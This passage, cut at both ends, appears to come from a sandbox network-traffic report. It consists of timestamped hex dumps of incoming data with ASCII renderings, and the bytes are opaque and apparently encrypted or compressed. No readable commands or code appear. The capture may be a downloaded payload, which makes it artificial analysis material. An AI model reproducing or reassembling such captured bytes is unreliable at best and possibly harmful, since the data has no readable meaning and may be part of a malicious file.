3a 43 61 29 bb a0 87 56 3e 0c 57 8d 55 cc ee d5 82 d2 d9 88 c8 ec d9 99 a2 3a b2 74 cd 9c 24 a4 03 fb 40 b2 e2 16 f9 a1 c7 b1 d6 53 Data Ascii: v,>Y1-d}"<D+IRLzb`N7zYEx1/h)m&9bUDX.iI@ji$C>F*)&Fwja7f:\|#\6</8nN)gfHUy))`(U~`IQH\|hX5:Ca)V>WU:t$@S
2021-10-13 13:52:05 UTC	653	IN	Data Raw: 10 c2 69 db a1 f1 32 39 8d 51 ed 0c da ac 61 8b 87 83 bd c5 9d 6d a8 dd 54 0f f9 f6 8d 74 10 7b f3 5f bc be 36 a1 b3 ae 23 04 eb ce 1c c7 10 84 05 8c 89 2f a2 78 86 82 cf 21 93 64 a6 a6 54 e6 5e 18 10 31 8b 65 97 10 0b fb 98 9a e4 41 b9 0a 2b da fd b8 94 0e 99 b9 48 1d ac 75 31 2c 5d cf d1 60 a7 d0 23 32 a7 37 49 9f e0 23 87 32 a4 a4 53 93 a4 02 6b ec 74 59 52 d1 a0 87 92 2a 6e 19 81 7e 3f 98 49 9f 59 27 70 fc 1a 7a a6 d3 9d 1d 4f 48 10 c1 ae 56 90 ea 51 4b 0a 8c ca 34 75 0c 1a 09 05 28 5c 17 89 91 dc 74 c0 64 e8 ac 04 03 ea 10 20 ec 82 45 6a 2d fc 19 ea b1 fe 5a 28 eb e6 7a 04 fe 87 ef ee bb bc 0c 72 b4 1c 73 25 18 39 79 23 d3 88 3c 65 f2 c0 f7 b5 a7 bb 30 48 68 9a ad 28 6a 25 41 a3 02 8d 79 d9 38 6d 2c d4 fe a4 e2 6f 19 0d ef a5 7b 9c 9d 73 0a da 16 f5 Data Ascii: i29QamTt{_6#/x!dT^1eA+Hu1,]`#27I#2SktYR*n~?IY'pzOHVQK4u(\td Ej-Z(zrs%9y#<e0Hh(j%Ay8m,o{s
2021-10-13 13:52:05 UTC	655	IN	Data Raw: d1 ac e2 02 ab 42 53 ca 44 d6 5b 34 99 e5 a8 7d 0d 6a 85 e6 46 28 05 e6 fc 71 fd 93 fe 7a 39 ec b5 36 9c 65 95 27 57 05 ce 1b f7 ea 0d c5 65 a7 9e df 45 20 01 f4 64 63 bf c7 ec 39 22 5e 0e a1 ed 2e 70 68 b8 50 22 2e 5a 84 35 38 7c ae 9e 35 b5 b4 19 dc 4e d8 97 c1 cf 72 2f dd 2d 5c 6a 66 0d 8e 9d 92 36 a0 24 b0 a3 f0 12 ce f9 f3 af 95 a0 92 34 30 97 8b bd f0 4d 57 b9 d7 b2 38 78 80 a4 4b 7c c9 91 09 af 53 74 7d d4 ec 53 bd f0 9f ec 40 6b 4f 2b 8d 97 62 87 83 a9 ae ea 5b 86 10 ca 71 c9 be ab 6f 45 d7 85 ff 60 aa 0b 7c bc 76 39 1f d5 e3 94 19 15 79 f1 55 99 1c b0 3c 05 6f 99 04 f2 f1 fe f3 0c 86 7b 33 c1 57 a3 ec 82 ee 99 eb c1 c9 00 f5 e8 bd c5 1a d5 8d 10 83 53 00 d1 55 20 d7 5b bc 0a 45 73 dd bd 19 c9 7b 47 cf ab 31 c1 74 e5 25 0c be 72 fc d8 b6 c0 cd ed Data Ascii: BSD[4}jF(qz96e'WeE dc9"^.phP".Z58\|5Nr/-\jf6$40MW8xK\|St}S@kO+b[qoE`\|v9yU<o{3WSU [Es{G1t%r
2021-10-13 13:52:05 UTC	656	IN	Data Raw: cd 0a 7e 8a af 04 9d 71 87 df ca 60 19 d7 ba ab 96 cc 1d 83 cf eb 58 7d 02 aa 91 24 af 9c 93 4e 8d 3e e0 49 97 65 f5 a4 73 50 ed b0 b5 11 16 43 0a ab a5 39 e1 a7 5e 2c fd fc 9c d2 c5 04 78 78 3e 75 da 8a 92 b2 be 77 00 63 e9 26 d1 1a 93 38 a3 c3 6c 3a cb f7 6f f6 26 25 55 4c 67 ef 96 11 6d da 98 71 09 c1 fd 71 00 ca b1 c1 95 76 af ab ec 96 62 09 d8 25 9a e6 7f d4 cc 6c a9 db b7 e8 fc 1b 2f 7d d5 0f 2f 32 93 8d 2e c6 b4 45 83 4e 3a b5 6d 09 ee 31 91 73 39 9a 51 2d a0 f3 2b 49 db d5 27 c1 b8 65 28 4a 58 ca 48 e1 1c b8 e1 2c b6 3a 68 9d 7a 61 ea 1b 72 a5 70 8e cd 3d 15 b7 10 09 e9 67 84 c5 57 8e 93 10 64 f5 b0 2b 86 c3 01 08 ea b8 9c d9 d2 85 d5 60 b1 82 8a 34 9d 5f e3 fa 7c b9 14 86 73 ee d8 45 1e b9 bc be 98 8a 5f 9b be 51 7c 16 6a 34 84 46 8d 40 6b 89 25 Data Ascii: ~q`X}$N>IesPC9^,xx>uwc&8l:o&%ULgmqqvb%l/}/2.EN:m1s9Q-+I'e(JXH,:hzarp=gWd+`4_\|sE_Q\|j4F@k%
2021-10-13 13:52:05 UTC	657	IN	Data Raw: 9d ff 9b ca 96 ab d6 64 a3 74 c4 3e 1f 61 e1 ea 55 8d 09 37 83 4e f2 8b 44 9a ea ed cd 7c 88 e8 4f 09 a3 19 16 4a f7 79 90 88 ed c1 2c 5f b5 04 f2 87 39 02 f4 60 d7 30 f8 e6 f5 60 9d 92 9d e8 2d d8 a1 a1 52 41 20 14 6f 32 1f 3e 52 b3 84 27 b9 54 3d 40 9a 51 c1 10 53 eb 6f 5b 28 8c e7 46 b2 c6 1d 14 db c2 5e c4 36 f6 87 32 aa 8d 28 6e 86 a2 50 23 e5 9d ff c8 4b 38 7d 76 27 7d 30 a0 f8 2a a1 01 12 9a 78 96 ed 4a 07 bf 05 05 fb de 7d f5 0c 3f cb 2b 91 ea 65 fc 4c d2 03 6a 42 00 30 42 79 8e b0 06 4c 78 30 df 4f d1 54 83 9f f3 31 1d 82 c0 d0 7a 5e db f8 77 3c 3a 9f bd 91 89 73 9c cc ed fb a4 74 8f b0 8d 9d 8c 4c 48 55 31 7b 34 fe a7 b7 0c cc c5 71 56 a0 7b 67 32 67 e6 34 97 4a f6 4a 35 c6 dd 58 a4 ab 71 72 13 d2 7c 27 24 9d bd 50 87 18 ca ae 03 18 ab be 53 fb Data Ascii: dt>aU7ND\|OJy,_9`0`-RA o2>R'T=@QSo[(F^62(nP#K8}v'}0*xJ}?+eLjB0ByLx0OT1z^w<:stLHU1{4qV{g2g4JJ5Xqr\|'$PS
2021-10-13 13:52:05 UTC	658	IN	Data Raw: f4 64 82 0b 15 03 19 71 ed d3 4c d4 00 a5 37 9c 3f c6 32 10 16 3d dc 1e 3d 52 68 81 bb 32 91 e6 bd d4 5d cb 8d 16 60 31 77 29 67 9b 68 d7 a9 fc a1 36 6b 44 a7 0d f3 72 d9 47 43 1e 68 f1 62 d9 65 4a 3b 94 97 68 ec 4d 3d 3a db 0d fe 0c a2 96 00 5d 71 7e 27 14 4f 17 9b d3 3e 90 39 f7 db db 73 2b 37 90 41 57 1c dc 7e 87 4f 96 14 87 49 38 43 6a c5 d4 7c e5 fe 1f 49 04 2f 4c 1d 62 6d a2 90 55 28 bc a8 0d 78 fc 8a b5 c6 a4 a7 dd 59 ac 82 3e fc 90 79 b9 0f fd 7d fa e7 a6 44 d3 98 ae 6d e9 c5 5f 77 7b 97 34 9d 49 65 70 01 db c8 8c ba 95 b9 ee 99 ac c0 3f f5 67 60 08 6c ee e3 d1 99 c3 ad 74 12 b2 5e 33 94 5d 4c 42 40 f2 9a f7 3d b0 fb 09 ef f9 37 98 48 84 13 c8 5f fa d8 88 50 36 62 bc c8 5b 45 9f bd 74 8c 0c 3e 3a 90 37 ca 96 2f 2c 6a 02 ec 35 ae 13 07 1b 60 ba 79 Data Ascii: dqL7?2==Rh2]`1w)gh6kDrGChbeJ;hM=:]q~'O>9s+7AW~OI8Cj\|I/LbmU(xY>y}Dm_w{4Iep?g`lt^3]LB@=7H_P6b[Et>:7/,j5`y
2021-10-13 13:52:05 UTC	660	IN	Data Raw: ef 39 0c 68 35 20 18 14 7b 3d cd 9c 3b 8d c0 18 90 f3 52 32 a1 13 0c 52 93 61 0f d9 b4 c3 fb 1d ae 8b a9 1d e2 15 62 e5 c8 fa d6 e8 30 04 c4 b5 89 d0 4a a9 62 60 4a bc 98 e8 95 b2 36 90 6d 3a f2 60 92 c2 0e 59 4e 1d 99 81 63 33 f7 a6 72 1a 90 56 50 24 62 ac 29 a7 c5 9b b5 b9 76 43 59 2c f5 54 71 55 33 41 42 09 99 48 f3 ff 81 09 4c e0 e2 a5 88 30 0f 1a 7a b0 df fd 80 b6 de 02 0f 87 19 fd 6c 0e 30 49 05 92 21 07 ef 2e ff 56 7a 9d 74 db c6 c7 c1 f7 45 6c 53 75 75 63 33 a7 74 31 0f 00 18 ca cc 4d 4c e5 1b 88 b1 77 09 e2 e5 4f 6a d2 e3 24 bf 41 4c 52 05 a5 3c 49 76 8c 47 13 4f 0f b7 2c 86 1f eb e6 f4 9c 99 e9 4a 97 6c 98 fe d2 e5 17 3d 6b c6 a1 15 f5 a2 14 ee 6c f1 ea 72 fa 07 1c 05 96 97 8b 89 fa 22 03 0c 36 03 9b 7a 92 c5 70 2d 9b 1f 66 48 95 24 32 f3 b0 7b Data Ascii: 9h5 {=;R2Rab0Jb`J6m:`YNc3rVP$b)vCY,TqU3ABHL0zl0I!.VztElSuuc3t1MLwOj$ALR<IvGO,Jl=klr"6zp-fH$2{
2021-10-13 13:52:05 UTC	661	IN	Data Raw: c3 ae 57 42 f0 d4 d1 f0 11 b5 12 72 52 33 3f 3d 67 03 fc 29 0b ec 66 b7 12 55 e5 3c 57 96 4b 54 4e e2 e1 11 dd a9 79 ac eb 61 e9 23 ee ad dd 4a 33 fc f8 56 9e ea 4c c3 e7 2a f2 c0 e9 a6 ef 5d 09 84 da b7 1c 1d 95 9e 7d f6 e1 92 bc 60 ad 5c fd 7f 1e 86 6b 16 36 95 32 5c 0a 3e 59 53 2f 34 35 b5 24 f6 98 cc 13 28 81 1b 2a 6a 1f ed f0 08 67 ce e6 93 c1 f6 ce a6 5d 1c 62 9d f8 25 83 54 d5 d6 f3 99 8e e7 31 38 0c 5e 73 b1 4c f1 de 55 91 dc 71 12 d4 0a c4 bf 1f 12 6b 07 a6 4c bc e5 47 9f d4 e8 b7 b3 07 a1 7a 40 17 35 f8 27 f6 8c 69 a3 2b 71 23 f4 79 f6 d0 09 7d c8 f0 d1 5c 15 c7 2e f1 71 03 df e3 59 d2 a1 bf c0 ab 1d 20 ca dd a6 2c ab e9 ad 35 dd 2f af 00 fc 8c 26 58 71 cd da 64 c8 7c 8c 52 df 37 31 99 2e ab 7f a4 25 e1 6f 14 dc 95 33 94 c7 92 2a cc 22 aa 2b d9 Data Ascii: WBrR3?=g)fU<WKTNya#J3VL]}`\k62\>YS/45$(jg]b%T18^sLUqkLGz@5'i+q#y}\.qY ,5/&Xqd\|R71.%o3*"+
2021-10-13 13:52:05 UTC	662	IN	Data Raw: fd 77 6d d5 53 8b 5a 7c 5e 7f 5f 16 b0 df c6 93 f5 ad 7b bc c2 ff 4a 8b 46 8f 98 cc 5c 6c 7a 49 f3 f5 4f 09 ed d1 ec a6 8d 03 0b 95 f9 0d 7b 22 d4 c6 f8 f1 5c 66 f1 da 24 20 3b f6 bf 7c 13 51 93 f7 60 a6 15 44 2d cb 66 ee c9 be bd 8a d8 06 94 94 4a 20 69 a8 af b3 d9 47 60 24 9c 95 e6 1b d6 37 14 cf c1 44 09 29 04 9e d7 dd 0a b4 94 33 79 1b 48 d5 0b ed 95 29 87 73 62 7a 01 5f 10 1f 2f b5 d2 a9 7c 96 67 e6 85 f1 ae c0 29 b3 b1 67 d7 57 35 91 28 3d e3 76 d3 b9 56 9e 75 94 8e 8f 1b b2 b7 0b a4 e2 5a 15 c9 df 40 cb c2 d2 8e 99 88 cc d8 71 3b 9a 31 da 52 e5 ec b3 32 6d d2 91 bf 86 7a d6 d7 be 29 df 5f d3 a0 fa 8e 52 88 56 d4 5b b9 f3 16 d2 af f5 01 91 e4 90 85 63 14 1a 68 ea 5a 16 0f 78 3a ba 30 67 f5 b6 d2 d8 db 09 a5 45 d2 7e 51 09 e9 ba d1 6b e0 b0 10 1e 47 Data Ascii: wmSZ\|^_{JF\lzIO{"\f$ ;\|Q`D-fJ iG`$7D)3yH)sbz_/\|g)gW5(=vVuZ@q;1R2mz)_RV[chZx:0gE~QkG
2021-10-13 13:52:05 UTC	663	IN	Data Raw: 99 2e 68 ad 0a 38 59 81 8a 72 30 1f 99 85 db 38 c1 28 2f ef a4 2d d7 88 ba 5a f3 48 f8 5e aa 67 92 9c 72 3b 2d a4 49 ce 57 5a a1 a9 33 26 f5 b4 4d 27 a9 f2 1b 52 9b 29 c0 29 b5 7f bf 92 91 cb db 4e f5 20 50 c9 48 f7 fc d8 f1 3c 6e 5f 05 83 27 c8 01 5e 84 db a4 43 ed b9 23 3f df 6d 07 99 6d 85 b4 6b 62 aa 64 bd 98 d6 79 dd 78 88 70 37 17 4d 32 7f 49 32 8d 3b 1c f6 09 a2 03 fd b9 d8 00 ee 4f f1 12 3e f7 89 2f 0b c0 00 b3 7f c8 53 18 e9 ab 91 7b 6d ab 40 9b f0 87 4b 18 ad b5 bd 89 55 bb 95 4b 5f 4f 5e 0f 3e a8 6b de 26 93 d9 d3 c5 12 68 fc 00 80 a4 06 c2 7e 06 36 87 99 11 ee 26 1e 1d b7 58 62 2e aa be 74 77 bb 7a b6 7d 11 b8 54 da d0 af 75 6c 73 5c 21 34 cb f2 81 44 90 b8 b3 d2 ec f4 8c b5 14 52 b3 49 04 d7 bf 42 fb 09 46 d3 64 4c 60 fa ba 5e 3b 4d 86 90 8b Data Ascii: .h8Yr08(/-ZH^gr;-IWZ3&M'R))N PH<n_'^C#?mmkbdyxp7M2I2;O>/S{m@KUK_O^>k&h~6&Xb.twz}Tuls\!4DRIBFdL`^;M
2021-10-13 13:52:05 UTC	664	IN	Data Raw: 58 e1 f2 80 84 be 02 45 fa d0 0c 0a f4 54 56 11 61 6b 26 65 61 e1 18 01 86 d8 10 cb d5 e9 b8 db 62 5a 2b e3 75 b7 8a 04 fa 50 98 26 a5 a6 90 ff 87 ca 9a f0 99 6e ae 44 3f fd aa 0e 6c 52 c4 fc 49 67 a5 bd 4f 50 3b b3 79 f3 79 c9 12 7d f5 f8 c9 e1 c3 92 2b 01 97 17 58 a9 c2 b3 46 15 eb 66 e6 3c 43 27 5f b7 a6 94 1f e1 9c c7 99 97 f5 c9 cf 65 e5 d1 90 8a 67 3d 61 b8 63 bc 07 7f aa e3 f7 fe 43 5c 31 6a 40 35 1f 2d 64 bc 52 69 09 20 be fd dd a9 38 f9 63 d2 3d 38 e2 db 2b 20 ce 23 d2 d2 36 f3 26 8f a3 60 9d 08 95 49 d6 50 40 94 a5 9a c8 28 e3 79 20 b9 14 bc e7 a4 d8 19 64 2a 12 3f 91 93 50 a4 1e 5f ad 88 cf 84 af 75 51 93 77 63 d2 9b 0d ba 06 31 70 56 18 a6 92 f5 75 80 64 ca d3 ab 0f 1d b3 93 58 c4 45 9e db 54 00 21 8c 8e 78 1d 18 09 d7 97 78 a7 18 fc 5d d8 93 Data Ascii: XETVak&eabZ+uP&nD?lRIgOP;yy}+XFf<C'_eg=acC\1j@5-dRi 8c=8+ #6&`IP@(y d*?P_uQwc1pVudXET!xx]
2021-10-13 13:52:05 UTC	666	IN	Data Raw: 47 d7 65 b5 eb a2 5c f9 c9 65 20 88 6c b0 f9 bb 00 9a e8 98 20 dd 4c 31 58 63 56 46 ae 1f 95 27 f2 e1 68 95 61 81 88 a6 cc a3 fc b2 a6 d7 53 20 d4 2d e6 f4 bb 6e 84 be 4f d3 8a 34 da 0a e5 a5 d6 e1 c6 8f cd a2 c2 3a 60 07 28 b9 cb 72 2b 0d 42 10 21 32 c4 a3 72 0a ab a8 f7 83 09 13 66 c8 9b df 6a d6 49 fd c4 01 ed 8f 7e a1 6c 18 54 56 0d b0 8e eb df 55 57 09 5c bd 07 19 c5 50 8d a7 8f 7f 41 16 04 88 72 a4 81 2f 58 57 34 c1 46 0c 94 09 92 6e 04 66 69 05 b2 52 5c ac 65 38 62 6e 5a 7d ce 74 0a 33 13 42 26 c4 53 1b a6 e9 1b df 5c a4 0d 47 26 62 cb 6d 6d f1 0b bf 75 3d aa 69 37 08 65 6d f4 00 8b f0 88 ad 3f 43 3d 95 96 b0 34 2d 16 08 64 03 1f 5b 2d bb 27 5a 39 62 12 1d 9a fd 5d c1 2c d0 89 54 e9 e0 cd c6 c9 e5 3a 1e ae 1c 8a 0a 09 8e b5 ce 79 cb d9 e3 e3 2f ae Data Ascii: Ge\e l L1XcVF'haS -nO4:`(r+B!2rfjI~lTVUW\PAr/XW4FnfiR\e8bnZ}t3B&S\G&bmmu=i7em?C=4-d[-'Z9b],T:y/
2021-10-13 13:52:05 UTC	667	IN	Data Raw: 3b b3 ed f6 01 8e 59 52 4f f4 3f e3 ff 6b df 93 02 fc c6 8a 39 ae c4 bf 01 4a fc 05 86 a5 fa ce b9 fa 24 08 ea 6e 21 46 d8 cc 40 0f 52 56 63 ad ec d8 58 d2 0e 01 43 02 54 45 ed d0 f6 8b 2b 64 fd 1f 32 23 db d8 2c 22 d1 d2 61 40 01 8d ac d4 75 a9 5d 22 78 7b 64 29 c3 67 58 59 6a d8 79 7c 8c be cb 79 12 3c 9b 55 82 c2 1a db f0 ca 94 db 3e 89 11 c9 61 1a 94 45 93 e6 c3 e6 1b 6e 52 c3 24 a9 e9 bf 8c 90 e4 df b1 aa 2a c4 13 d9 2c c5 9a d4 ef 0e a7 75 b1 f3 35 bc f1 6c d8 75 d5 cb 3f ff 2c a9 ab 97 c9 4d 82 bb d4 56 d6 2b 4f 81 99 c5 28 0e 83 de f0 15 ab 89 8d b6 4e f8 55 16 a0 d2 d8 e5 9d ca c5 a5 5a b0 18 cf 3a 77 36 1c 46 11 33 3f f1 18 a6 0a 3b 29 aa a3 4a 61 93 27 0c 84 5d f3 a2 a3 6c 5f 03 02 29 15 fd 6f a1 13 d8 40 cf 8a 80 01 7b 29 31 4e 8d df 84 b2 89 Data Ascii: ;YRO?k9J$n!F@RVcXCTE+d2#,"a@u]"x{d)gXYjy\|y<U>aEnR$*,u5lu?,MV+O(NUZ:w6F3?;)Ja']l_)o@{)1N
2021-10-13 13:52:05 UTC	668	IN	Data Raw: f3 da 8b 41 59 48 15 21 56 c4 38 6e ee f9 da 6c 0e 89 93 99 80 e6 6d 35 ad 1b a2 71 69 2a b1 b9 49 76 4c 42 65 e4 70 69 c8 62 d8 01 09 76 b8 80 e5 41 61 7c a3 f0 2e ca 8f 23 01 e8 3d b9 78 83 97 b7 4e 54 70 5e fa f6 fc cf 0b 61 44 f6 73 e1 db b4 37 21 d3 63 86 d6 75 62 02 ee 34 af 58 54 d4 60 79 ab cc 38 1c ef c6 75 db 0f 4e 97 45 6e 3d 78 71 49 4f 22 56 f4 78 cc 5e 47 0d e9 25 a1 b0 f4 0a e4 bd 34 0f ca b1 15 b7 d6 fd 64 08 c3 7d 3a 3d 04 53 35 17 d4 8f 8c 5e 4e 0a 2b 18 d4 34 7d 81 2e 83 57 45 20 f8 12 f1 b7 a2 ba bb 3e 78 02 62 61 0b de bd d9 d6 12 e7 8c ac 25 ea 98 0b 9d ba 03 c2 a7 22 1d fb 84 1e ba 4c c6 cc 64 79 d2 d3 98 65 db c0 a1 5e 57 5a 16 83 59 eb 9e 89 6e 37 3f 31 33 0b a1 e0 af 25 2e a3 3d 6c c8 a5 cc 4c b2 25 f1 0f 09 5d 5f 32 f0 8a e5 7b Data Ascii: AYH!V8nlm5qi*IvLBepibvAa\|.#=xNTp^aDs7!cub4XT`y8uNEn=xqIO"Vx^G%4d}:=S5^N+4}.WE >xba%"Ldye^WZYn7?13%.=lL%]_2{
2021-10-13 13:52:05 UTC	669	IN	Data Raw: 65 42 7f 20 e3 eb 2b b8 68 ab ce ff 7a 05 e5 65 14 cb 17 a3 29 41 36 71 e0 f5 42 0a 9f 5f b6 6c 2e 33 4b f2 89 36 2d 8c 25 18 a8 01 79 98 2b b1 7a b6 9b 81 53 b3 ec 31 97 71 2d 86 6e d6 4d 2a 1a 81 96 73 ec 33 af 0b 28 2c 21 b3 bd 6e 53 a3 8c 7b e5 5a 9b b8 77 c4 08 a6 21 b8 27 e4 1f 61 2b 22 8c 9c be be 3e 12 6b 2a c7 26 9d 92 e4 10 32 fe 7b bf b7 0f 4f 88 4a 7f 06 d8 1a f3 0b 47 6e 7e 45 0e 09 74 cd 05 d1 d0 6c d4 7f 90 99 e4 d0 ac 1c 9a f8 6c 76 4f 8f 9e 4f fc 13 a3 33 d1 26 d5 2f 95 93 d9 f7 70 51 85 95 ed 79 d7 14 9e 3f 87 83 2d 1a 71 5c bc 34 de 39 8b 16 dd c2 67 1d c3 b2 7e 82 1f ff 26 eb 6b 09 ee 4b 37 e7 cf e2 35 ea 17 56 17 16 f1 ee ab ea fe 4c ae 2d fe 35 72 ef 4c e5 1d 84 9b 3c 7a 23 95 b1 e2 f2 21 f5 e8 f5 68 3a a3 d7 c0 d4 e0 14 4d 67 76 b9 Data Ascii: eB +hze)A6qB_l.3K6-%y+zS1q-nMs3(,!nS{Zw!'a+">k&2{OJGn~EtllvOO3&/pQy?-q\49g~&kK75VL-5rL<z#!h:Mgv
2021-10-13 13:52:05 UTC	671	IN	Data Raw: 9a c3 6b ed 42 94 13 7e 89 c9 95 29 89 02 3a 96 09 78 3b be 03 bc fc 00 c5 fe fb ed 5b d9 cb 4f 3f a5 a3 15 aa 15 2e 3a 68 7e c1 a1 7e c4 b9 7b 76 0e df 11 c9 24 c5 1f 82 e6 91 2a a5 0c 93 a4 e7 11 8a 4d f5 3c 0b b1 16 17 13 e4 2d 63 91 45 c2 81 4e 79 b5 51 b4 76 51 91 c9 2a 13 3b eb 3e 2d 25 91 12 49 02 99 5f ea d9 9a 7d 20 fb 57 ff 9c 25 1c f8 36 ba 55 77 26 c4 7d 07 8c 94 b8 d9 18 48 74 7b 60 f6 d3 61 3d 51 26 c9 6d d2 64 0e 26 2f 5a 32 50 eb 35 2f 9e 8d b4 d6 69 7b d9 57 a1 b3 bd 46 90 28 11 e7 19 40 89 30 71 3f ec db f0 18 52 8a a9 fc 64 eb 34 d8 48 92 31 84 a3 7d 22 b7 03 1d 5c 52 b6 b3 56 a4 cc a8 54 eb bf 7b c3 f4 5d db 82 8e 18 6d ed 01 ee 5e 76 fd b6 03 33 fa 9b 40 a1 04 17 d3 9d 29 41 dd e5 a5 3d 3a 3d 38 5a da d7 78 85 ed fa 36 8d 40 95 88 ad Data Ascii: kB~):x;[O?.:h~~{v$M<-cENyQvQ;>-%I_} W%6Uw&}Ht{`a=Q&md&/Z2P5/i{WF(@0q?Rd4H1}"\RVT{]m^v3@)A=:=8Zx6@
2021-10-13 13:52:05 UTC	672	IN	Data Raw: d6 5d 11 1c 16 ba e5 a9 a0 49 00 f2 45 8c ae 34 96 57 33 7c 70 0e 3e 16 2b f6 f2 7f e2 27 4e 28 03 5f 32 ee fb 3d a6 f4 db 2b fc 30 e5 ee 9c 11 ba 0d 65 41 81 93 c2 ac 88 4e e4 77 69 3d 81 f6 d6 07 98 7b f2 ee 15 1d 06 5e a5 49 11 31 e0 e2 c3 d4 41 aa 4d 21 77 1a 01 01 be 2f 9e 9b 44 74 f5 2f 1e b9 3d 5d f7 73 e5 b8 00 e1 3c f9 be e7 f4 10 df 63 52 5f bd 0e 16 46 74 4e 63 e1 04 73 8b b1 02 39 19 e2 bb 8e 59 3c e5 9b 13 e8 7c e0 e8 b9 8c b6 82 90 46 b8 a5 e1 f5 ab 1b c0 8a eb 6d 63 03 22 91 23 57 e3 26 2c a1 3c 52 c6 cb 23 04 67 00 79 a9 85 21 22 8c 30 78 13 ef b7 e6 19 97 fd 9a 3f 56 37 5a 96 32 17 ca c0 fb 12 1d 4e 25 4b f0 ff 58 c2 e0 a7 7e 5c ff 77 d6 38 de d1 53 ed dc 25 8f 6f 62 d5 47 ff 83 91 f6 68 2f e0 2e 1f 8a f2 97 d3 06 1e c0 0d 79 f9 c6 31 40 Data Ascii: ]IE4W3\|p>+'N(_2=+0eANwi={^I1AM!w/Dt/=]s<cR_FtNcs9Y<\|Fmc"#W&,<R#gy!"0x?V7Z2N%KX~\w8S%obGh/.y1@
2021-10-13 13:52:05 UTC	673	IN	Data Raw: 84 d6 ab 7c e8 57 a6 2f 2a 6e 23 a3 47 52 57 e7 3d c8 83 0a 46 1e d1 02 2d 32 2e 8b 7d 83 7a 9b 55 09 69 69 af 76 3e 2d d0 8f 3b 61 be 55 aa 55 61 43 e1 2f 52 8d 5f 0b 09 22 2d 6a f9 71 ea f7 ab 4d d9 03 5d 1a 3d bb 65 55 eb 62 87 41 49 84 50 41 8c 4a 30 55 75 43 2b 23 0a 57 7e dc 71 e7 6a a3 77 5a 56 fe d9 30 39 34 f9 45 46 24 92 72 5c 2a 81 39 88 75 97 bc c0 ee d6 49 13 10 c0 16 66 4e bd 9f a1 e7 0c d4 31 d4 66 e7 de 97 84 b9 fb 3e 70 9f e1 50 96 ba 1e 3d 9b c1 1d 56 f5 08 22 12 f3 0d 36 d7 1a 1d 3b 93 75 01 24 cd 85 e8 a3 25 ad d2 ab 6f cc a4 09 df 39 cb 9e 10 fb 43 65 fc b2 65 af 71 76 36 d8 c7 c9 ec 03 47 83 aa 26 16 4c d1 6c 8a eb 17 52 a7 a3 e7 cf 24 1e 77 cc e4 08 2f fb 24 ec 8a 42 ac d4 4f 38 12 2b c0 6c 4d 7f 99 d5 e0 8f ca c6 52 e6 85 ff f4 70 Data Ascii: \|W/n#GRW=F-2.}zUiiv>-;aUUaC/R_"-jqM]=eUbAIPAJ0UuC+#W~qjwZV094EF$r\9uIfN1f>pP=V"6;u$%o9Ceeqv6G&LlR$w/$BO8+lMRp
2021-10-13 13:52:05 UTC	674	IN	Data Raw: 2a 6d 20 1f 50 5c c7 b1 67 da c2 04 36 f3 da 27 a4 e3 4b 56 4b b6 92 37 69 86 65 15 44 0b c8 9a c7 a4 dd be 2f cc 8a 71 83 90 f5 f3 09 bd ef c4 bb c8 52 c7 93 3a 30 2d 12 2c d0 bb 5a bb fa 3c 4c cf c6 6b 44 a0 e7 40 6f 2b a4 a2 2e 05 4d 5e dd 00 74 e5 70 a9 b1 a6 df c2 4c 03 69 03 ac ca 8e 6a f4 f9 06 11 c1 53 d9 c8 b0 96 11 db f9 80 93 dd 74 e5 1e 93 c5 59 47 5e 8b 69 68 2e 42 03 09 16 ce 21 53 42 93 81 7c 6b 77 0a 7d 2a 5a 89 20 e5 c1 73 95 d0 77 c6 1f 13 0f 99 22 ca 61 7b 6c df c6 a2 52 cc e3 f3 0b f3 fe 46 a1 07 7d 71 1d 9c d3 bf 0a de f1 94 d9 08 99 7a 2c f4 45 3c af d7 84 76 92 c0 b4 d2 d1 ba a1 47 a1 74 ad a5 6c 81 71 ca 79 5a f8 e7 18 ec 5d ee ec 1f a7 b9 c8 55 3a 7c c4 72 45 e6 53 d5 de 96 dc 3f f6 ac eb 7d 92 48 8b ca 32 fd b8 cb 88 8e 19 3a d5 Data Ascii: m P\g6'KVK7ieD/qR:0-,Z<LkD@o+.M^tpLijStYG^ih.B!SB\|kw}Z sw"a{lRF}qz,E<vGtlqyZ]U:\|rES?}H2:
2021-10-13 13:52:05 UTC	676	IN	Data Raw: 43 73 c8 b5 9f fb ba 6e 01 00 70 4e f7 9a 7e 8c 69 5a ed bc 2d fd 7b d2 88 dd bd 11 8a 9d a0 90 34 fa a9 e9 f9 65 5d 54 ef f9 f2 b6 a4 72 56 e4 f6 4b 41 a7 50 23 fe 9b 72 e4 0b 2f 24 f2 c4 6d 37 6b d3 bc 0d cd f8 f1 12 a7 96 8c 08 29 ba 7b 02 6e 4f 47 d4 5f a1 a8 2b b0 f1 87 2f 77 a1 02 5d b1 b1 70 ef 72 e0 a0 31 31 6e 1c a4 6a 5e 8d ef f0 b6 19 ce 62 17 c2 17 10 af 49 bf f0 d1 44 70 94 ed b5 d3 62 e8 e6 ad ae 8e eb 8c c1 88 ad d2 97 c4 39 e1 e4 00 b2 90 24 3d 58 ef d9 96 cc 2b 4e 87 43 80 cf 7e 85 c2 b4 e5 a3 6d d4 ed 4a 65 b2 e1 85 ab 85 a8 b3 be 97 cc 90 36 ba d2 69 4a 42 95 47 4e 87 cb 14 69 2b 49 95 27 ca 73 2c c7 19 2b 2d 91 8a d6 70 1b d0 37 25 68 9f 71 80 63 5d 6b be 3b b8 54 0b 9f ef 3a e4 7a 68 a2 f5 63 3a 86 b2 85 25 46 a9 44 d1 07 ea d8 cc 7b Data Ascii: CsnpN~iZ-{4e]TrVKAP#r/$m7k){nOG_+/w]pr11nj^bIDpb9$=X+NC~mJe6iJBGNi+I's,+-p7%hqc]k;T:zhc:%FD{
2021-10-13 13:52:05 UTC	677	IN	Data Raw: 1f 47 da b4 c0 9f 33 aa 5d ed 1b e8 78 ff d8 00 f1 c3 12 fb 47 6c 7e c4 66 46 2e 92 d9 3d 43 78 b8 43 d8 d0 c7 26 ea 80 66 c5 5f d1 09 c4 16 1d 75 f4 25 3d e5 30 66 64 29 78 84 fe 36 d6 2b 00 a7 c3 2a cc 21 d6 26 2b bd d2 35 79 26 50 9d e0 d4 f6 75 14 ab e0 b2 57 79 22 e7 bc 60 b8 61 55 9c 41 d7 ce 7d f6 23 5a 9f df 79 3a 1b f1 a6 bc 76 ef 6a bd 63 22 0f 03 4d 0a 38 32 4d fc 81 8a 58 61 2e 0f 83 67 20 b3 86 54 a0 90 35 4c 65 f2 c6 d8 7d 9d 05 fa aa 93 3b d5 84 74 ef 81 14 02 d2 96 7a 36 0b 0e c0 f8 01 65 72 80 ec f1 7c 1c 57 e8 